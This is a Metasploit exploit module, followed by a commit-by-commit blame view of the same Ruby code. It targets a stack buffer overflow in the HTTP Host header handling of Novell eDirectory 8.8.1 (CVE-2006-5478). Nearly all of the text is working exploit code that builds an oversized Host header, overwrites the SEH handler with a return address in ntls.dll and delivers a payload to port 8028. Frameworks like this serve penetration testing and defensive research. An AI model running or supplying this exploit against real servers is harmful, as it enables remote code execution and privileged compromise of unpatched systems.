modules/exploits/windows/http/edirectory_host.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell eDirectory NDS Server Host Header Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
        The web interface does not validate the length of the
        HTTP Host header prior to using the value of that header in an
        HTTP redirect.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-5478'],
          ['OSVDB', '29993'],
          ['BID', '20655'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2006-10-21',
      'DefaultTarget' => 0))

    register_options([Opt::RPORT(8028)])
  end

  def exploit
    connect

    sploit =  "GET /nds HTTP/1.1" + "\r\n"
    sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
    sploit << "," + rand_text_alphanumeric(719, payload_badchars)
    seh    = generate_seh_payload(target.ret)
    sploit[705, seh.length] = seh
    sploit << "\r\n\r\n"

    print_status("Trying target #{target.name}...")

    sock.put(sploit)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Novell eDirectory NDS Server Host Header Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`The web interface does not validate the length of the`
			`HTTP Host header prior to using the value of that header in an`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`HTTP redirect.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'References' =>`
			`[`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`['CVE', '2006-5478'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '29993'],`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`['BID', '20655'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 600,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`],`
			`'Privileged' => true,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2006-10-21',`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`'DefaultTarget' => 0))`

Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(8028)])`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`end`

			`def exploit`
			`connect`

big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`sploit = "GET /nds HTTP/1.1" + "\r\n"`
			`sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)`
			`sploit << "," + rand_text_alphanumeric(719, payload_badchars)`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`seh = generate_seh_payload(target.ret)`
			`sploit[705, seh.length] = seh`
			`sploit << "\r\n\r\n"`

			`print_status("Trying target #{target.name}...")`

			`sock.put(sploit)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`